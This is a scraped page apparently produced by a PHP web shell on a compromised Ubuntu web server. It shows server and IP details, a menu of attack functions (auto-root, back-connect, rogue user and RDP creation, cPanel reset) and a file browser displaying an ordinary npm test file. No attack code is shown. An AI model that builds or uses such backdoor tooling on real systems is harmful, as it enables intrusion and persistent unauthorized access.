Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
kuler /
[ HOME SHELL ]
Name
Size
Permission
Action
.travis.yml
51
B
-rw-rw-r--
LICENSE
1.03
KB
-rw-rw-r--
README.md
903
B
-rw-rw-r--
index.js
2.5
KB
-rw-rw-r--
package.json
645
B
-rw-rw-r--
test.js
883
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test.js
const { it, describe } = require('mocha'); const assume = require('assume'); const kuler = require('./'); describe('kuler', function () { it('renders colors in the terminal', function () { console.log(' VISUAL INSPECTION'); console.log(' '+ kuler('red').style('F00')); console.log(' '+ kuler('black').style('#000')); console.log(' '+ kuler('white').style('#FFFFFF')); console.log(' '+ kuler('lime').style('AAFF5B')); console.log(' '+ kuler('violet').style('#ee82ee')); console.log(' '+ kuler('purple').style('#800080')); console.log(' '+ kuler('purple').style('#800080'), 'correctly reset to normal color'); console.log(' '+ kuler('green', '#008000')); }); describe('#style', function () { it('has a style method', function () { assume(kuler('what').style).is.a('function'); }); }); });
Close